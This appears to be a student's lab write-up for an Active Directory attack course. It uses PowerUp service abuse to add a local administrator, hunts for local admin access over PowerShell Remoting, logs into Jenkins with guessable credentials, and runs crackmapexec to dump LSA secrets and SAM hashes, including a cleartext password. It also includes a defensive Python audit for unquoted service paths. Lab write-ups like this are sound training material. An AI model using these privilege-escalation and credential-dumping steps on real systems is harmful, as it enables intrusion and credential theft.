# Learning Objective - 5

## 5. Service abused on the student VM for local privilege escalation

```
PS C:\AD\Tools> Import-Module .\PowerUp.ps1
PS C:\AD\Tools> Get-ServiceUnquoted -Verbose
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer


ServiceName    : AbyssWebServer
Path           : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users;
                 Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart     : True

VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer
ServiceName    : AbyssWebServer
Path           : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart     : True

PS C:\AD\Tools> Get-ModifiableServiceFile -Verbose
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer


ServiceName                     : AbyssWebServer
Path                            : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiableFile                  : C:\WebServer\Abyss Web Server
ModifiableFilePermissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : Everyone
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'AbyssWebServer'
CanRestart                      : True

PS C:\AD\Tools> Get-ModifiableService -Verbose
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer
VERBOSE: Current user has 'ChangeConfig' for AbyssWebServer
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer


ServiceName   : AbyssWebServer
Path          : C:\WebServer\Abyss Web Server\abyssws.exe -service
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'AbyssWebServer'
CanRestart    : True
```

Answer:

```
AbyssWebServer
```
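The PowerUp output above reports two separate file-system weaknesses for the same service: the unquoted ImagePath with spaces (`C:\WebServer` is writable by `BUILTIN\Users`) and the service's own directory being writable by `Everyone`. The following audit helper is an added example, not PowerUp's code or anything from the lab; it reproduces those two checks on constructed input that mirrors the page (the ImagePath and the writable-directory list are hard-coded here, where on a real host they would come from the service's registry ImagePath and the folder ACLs) and emits the quoted ImagePath a remediation would set via `sc config <svc> binPath=`. The `ChangeConfig` right from `Get-ModifiableService` is a service-DACL problem, not a file one, and is outside what this helper checks.

```python
"""Service ImagePath audit (added example, not the page's own code)."""
import ntpath

# Constructed sample, mirroring the PowerUp output on this page.
IMAGE_PATH = r"C:\WebServer\Abyss Web Server\abyssws.exe -service"
# Directories a low-privileged identity can write to (constructed from the
# ACL output above; on a real host read these from the folder DACLs).
WRITABLE_DIRS = {
    r"C:\WebServer": r"BUILTIN\Users",
    r"C:\WebServer\Abyss Web Server": "Everyone",
}


def split_command(image_path):
    """Return (executable, arguments) for a service ImagePath. For an
    unquoted path the text up to the first '.exe' is taken as the executable."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end], s[end + 1:]
    idx = s.lower().find(".exe")
    if idx == -1:
        return s, ""
    return s[: idx + 4], s[idx + 4:]


def candidate_paths(image_path):
    """Executables Windows would try, in order, before the intended one when
    an unquoted ImagePath contains spaces. Empty when there is no ambiguity."""
    s = image_path.strip()
    exe, _ = split_command(s)
    if s.startswith('"') or " " not in exe:
        return []
    parts = exe.split(" ")
    # Each space-separated prefix of the executable path is tried first.
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def audit_service(image_path, writable_dirs):
    """Flag every location where a low-privileged identity could place a file
    that the service would then run under its own account (LocalSystem here)."""
    findings = []
    lowered = {d.lower(): who for d, who in writable_dirs.items()}
    for cand in candidate_paths(image_path):
        who = lowered.get(ntpath.dirname(cand).lower())
        if who:
            findings.append({"path": cand, "reason": "unquoted path", "identity": who})
    exe, _ = split_command(image_path)
    who = lowered.get(ntpath.dirname(exe).lower())
    if who:
        findings.append({"path": exe, "reason": "binary directory writable", "identity": who})
    return findings


def quoted_image_path(image_path):
    """Remediation for the unquoted-path finding: quote the executable part,
    leaving the arguments untouched. Already-quoted paths are returned as-is."""
    exe, args = split_command(image_path)
    return '"' + exe + '"' + args


if __name__ == "__main__":
    for f in audit_service(IMAGE_PATH, WRITABLE_DIRS):
        print(f"[!] {f['reason']:<26} {f['path']}  (writable by {f['identity']})")
    print("Fixed ImagePath:", quoted_image_path(IMAGE_PATH))
```

Quoting the path only removes the search ambiguity; the second finding (the `Everyone`-writable service directory) still needs the folder ACL tightened so that only administrators and the service's own installer can write there.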

Exploitation

```
[*] Checking service permissions...


ServiceName   : SNMPTRAP
Path          : C:\Windows\System32\snmptrap.exe
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'SNMPTRAP'
CanRestart    : True
```

```
PS C:\AD\Tools> Invoke-ServiceAbuse -Name 'SNMPTRAP'
WARNING: Waiting for service 'SNMP Trap (SNMPTRAP)' to stop...

ServiceAbused Command
------------- -------
SNMPTRAP      net user john Password123! /add && net localgroup Administrators john /add


PS C:\AD\Tools> net users

User accounts for \\DCORP-STD723

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
john                     WDAGUtilityAccount
The command completed successfully.
```

We start a cmd as administrator.

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2FDqDhgxKQ7aQe497IB2Kr%2Fimage.png?alt=media&#x26;token=b724511f-63ce-441b-bc85-b76461f2b6a2" alt=""><figcaption></figcaption></figure>

And then we add our user as a local administrator.

```
C:\Windows\system32>net localgroup Administrators dcorp\student723 /add
The command completed successfully.


C:\Windows\system32>net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
dcorp\Domain Admins
dcorp\student723
john
The command completed successfully.

```

## Script used to look for administrator privileges using PowerShell Remoting

First attempt:

```
PS C:\AD\Tools> Find-LocalAdminAccess -Verbose
VERBOSE: [Find-LocalAdminAccess] Querying computers in the domain
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
VERBOSE: [Invoke-LDAPQuery] filter string: (&(samAccountType=805306369))
VERBOSE: [Get-DomainComputer] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Find-LocalAdminAccess] TargetComputers length: 28
VERBOSE: [Find-LocalAdminAccess] Using threading with threads: 20
VERBOSE: [New-ThreadedFunction] Total number of hosts: 28
VERBOSE: [New-ThreadedFunction] Total number of threads/partitions: 20
VERBOSE: [New-ThreadedFunction] Threads executing
VERBOSE: [New-ThreadedFunction] Waiting 100 seconds for final cleanup...
VERBOSE: [New-ThreadedFunction] all threads completed
```

Failed.

Second attempt:

```
PS C:\AD\Tools> Get-NetComputer | select samaccountname

samaccountname
--------------
DCORP-DC$
DCORP-ADMINSRV$
DCORP-APPSRV$
DCORP-CI$
DCORP-MGMT$
DCORP-MSSQL$
DCORP-SQL1$
DCORP-STDADMIN$
DCORP-STD721$
DCORP-STD722$
DCORP-STD724$
DCORP-STD723$
DCORP-STD726$
DCORP-STD729$
DCORP-STD725$
DCORP-STD728$
DCORP-STD727$
DCORP-STD731$
DCORP-STD732$
DCORP-STD730$
DCORP-STD733$
DCORP-STD735$
DCORP-STD734$
DCORP-STD736$
DCORP-STD737$
DCORP-STD739$
DCORP-STD740$
DCORP-STD738$
```

```
PS C:\AD\Tools> .\Find-WMILocalAdminAccess.ps1 -ComputerFile .\computers.txt
```

Failed.

Third attempt:

```
PS C:\AD\Tools> . .\Find-PSRemotingLocalAdminAccess.ps1
PS C:\AD\Tools> Find-PSRemotingLocalAdminAccess
dcorp-std723
dcorp-adminsrv

PS C:\AD\Tools> nslookup dcorp-adminsrv
Server:  UnKnown
Address:  172.16.2.1

Name:    dcorp-adminsrv.dollarcorp.moneycorp.local
Address:  172.16.4.101
```

{% code overflow="wrap" %}

```
PS C:\AD\Tools> Enter-PSSession -ComputerName dcorp-adminsrv -Credential dcorp\student723
[dcorp-adminsrv]: PS C:\Users\student723\Documents> whoami
dcorp\student723
[dcorp-adminsrv]: PS C:\Users\student723\Documents> ls
[dcorp-adminsrv]: PS C:\Users\student723\Documents> cd ..
[dcorp-adminsrv]: PS C:\Users\student723> cd /
[dcorp-adminsrv]: PS C:\> ls


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          5/8/2021   1:15 AM                PerfLogs
d-r---        11/11/2022  12:55 AM                Program Files
d-----          5/8/2021   2:34 AM                Program Files (x86)
d-----         12/3/2023   6:36 AM                Transcripts
d-r---         2/20/2024   4:42 PM                Users
d-----         1/10/2024   1:05 AM                Windows


```

{% endcode %}

## Jenkins user used to access Jenkins web console

<http://172.16.3.11:8080/>

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2FtSGQqKcewxGMihTQhjk2%2Fimage.png?alt=media&#x26;token=bb4a2516-8b7a-41f8-9631-c3b61b11c7ec" alt=""><figcaption></figcaption></figure>

```
manager:manager
```

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2FCGx7BC66g7NhJa9BnELm%2Fimage.png?alt=media&#x26;token=b6963423-50c0-46d8-a2dd-ba351e7cea92" alt=""><figcaption></figcaption></figure>

```
builduser:builduser
```

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2FzJhBwh6ZCRZkKfm4zFOw%2Fimage.png?alt=media&#x26;token=a5e332a9-601c-47dc-b64a-58dd2332878f" alt=""><figcaption></figcaption></figure>

Link: <http://172.16.3.11:8080/job/Project0/configure>

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2F9l68GcO9l1L4dzDBGUuO%2Fimage.png?alt=media&#x26;token=7e4e6d67-13c9-4da5-9f78-b916203ed65e" alt=""><figcaption></figcaption></figure>

Then we obtain the result:

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2FaFMeRLHe9bEkfneghYEu%2Fimage.png?alt=media&#x26;token=07cf8214-285d-4d50-94a0-8e464cfc7617" alt=""><figcaption></figcaption></figure>

Answer:

```
builduser
```

## Domain user used for running Jenkins service on dcorp-ci

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2FUaLY3cH5aDJGLZku0sdU%2Fimage.png?alt=media&#x26;token=f47510aa-32b6-4000-901f-7a0920d06c8e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2FUqutBO8UPiYjwmRiJ0u4%2Fimage.png?alt=media&#x26;token=b9578572-af5d-4be5-806d-100d783f7c25" alt=""><figcaption></figcaption></figure>

Answer:

```
dcorp\ciadmin
```

Plus

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2FIShxh7XTmXqshpilEEbI%2Fimage.png?alt=media&#x26;token=1897e1f9-cd64-432a-8424-7592df3c99b9" alt=""><figcaption></figcaption></figure>

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2FLjzAjc2aD8CCOfJd1tCk%2Fimage.png?alt=media&#x26;token=1143b815-e079-4336-b4c4-e6501728bb13" alt=""><figcaption></figcaption></figure>

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2F3CC1VqnCwr5mttNuqhgo%2Fimage.png?alt=media&#x26;token=babe2ae0-6e72-4102-a325-d70c0ae9ba77" alt=""><figcaption></figcaption></figure>

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2Flia7rBIvt0hNE8XzJZue%2Fimage.png?alt=media&#x26;token=582d8e46-6812-43d1-a1d5-409a0f56fd25" alt=""><figcaption></figcaption></figure>

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2Fl0PmHAk89c7PraxynI8A%2Fimage.png?alt=media&#x26;token=61896d49-4e70-490d-9c70-911a9a2eff1d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2FvR2WRooh07HnCMXFd8P4%2Fimage.png?alt=media&#x26;token=e1be1f29-c5c6-4049-8496-bc06aacedaba" alt=""><figcaption></figcaption></figure>

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2FeYg2rF3y6bqKabXPJahV%2Fimage.png?alt=media&#x26;token=61cbaf26-e68c-4a27-97a9-260664eed041" alt=""><figcaption></figcaption></figure>

```
crackmapexec smb 172.16.3.11 -u student723 -p hT3qDFRHGzVpJtym --lsa
SMB         172.16.3.11     445    DCORP-CI         [*] Windows 10.0 Build 20348 x64 (name:DCORP-CI) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB         172.16.3.11     445    DCORP-CI         [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym (Pwn3d!)
SMB         172.16.3.11     445    DCORP-CI         [+] Dumping LSA secrets
SMB         172.16.3.11     445    DCORP-CI         DOLLARCORP.MONEYCORP.LOCAL/ciadmin:$DCC2$10240#ciadmin#3999881514643dbc5cd4efcdce983215
SMB         172.16.3.11     445    DCORP-CI         DOLLARCORP.MONEYCORP.LOCAL/student723:$DCC2$10240#student723#eb5f214b28ad3157316b015e0ceb0dde
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:aes256-cts-hmac-sha1-96:8ec0804e2ed229f58336a750f8627490d3cdcb523de3031acfe4db47fb035073
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:aes128-cts-hmac-sha1-96:00527bdd009fedf4f9e116f7270fd8be
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:des-cbc-md5:d08a1a1fabdfc789
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:plain_password_hex:360056003d002b004c002600470051004e0055003b00220061007500280056004f00390025006a0071003c005f005e003d004600600033004a0071004d0043002200500021005100300068006f005b00490071005b002800430075006d005d007200530025006a004b004b00280023002d005d0064002d006800720049003c006e0042003600760056006f00220044004c00670045007700450059003a002a006300600051003e00600033003e005200430075006e002f0033005e0024007200630034004e002800650045006b0022002400570045007400770071005a0068005b00380026002f004b0048005c007400
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:aad3b435b51404eeaad3b435b51404ee:f76f48c176dc09cfd5765843c32809f3:::
SMB         172.16.3.11     445    DCORP-CI         dpapi_machinekey:0x4796c1a459d09e880ee84dc5958f1cdca366c808
dpapi_userkey:0xeba6b8fb6245f03382bff91e8fb6fd323080b80c
SMB         172.16.3.11     445    DCORP-CI         NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
SMB         172.16.3.11     445    DCORP-CI         dcorp\ciadmin:*ContinuousIntrusion123
SMB         172.16.3.11     445    DCORP-CI         [+] Dumped 10 LSA secrets to /home/dsds/.cme/logs/DCORP-CI_172.16.3.11_2024-02-20_212833.secrets and /home/dsds/.cme/logs/DCORP-CI_172.16.3.11_2024-02-20_212833.cached
```

```
crackmapexec smb 172.16.3.11 -u student723 -p hT3qDFRHGzVpJtym --sam
SMB         172.16.3.11     445    DCORP-CI         [*] Windows 10.0 Build 20348 x64 (name:DCORP-CI) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB         172.16.3.11     445    DCORP-CI         [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym (Pwn3d!)
SMB         172.16.3.11     445    DCORP-CI         [+] Dumping SAM hashes
SMB         172.16.3.11     445    DCORP-CI         Administrator:500:aad3b435b51404eeaad3b435b51404ee:deaa870c264c682aa1fbfc31ebe678a2:::
SMB         172.16.3.11     445    DCORP-CI         Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.3.11     445    DCORP-CI         DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.3.11     445    DCORP-CI         WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.3.11     445    DCORP-CI         [+] Added 4 SAM hashes to the database
```
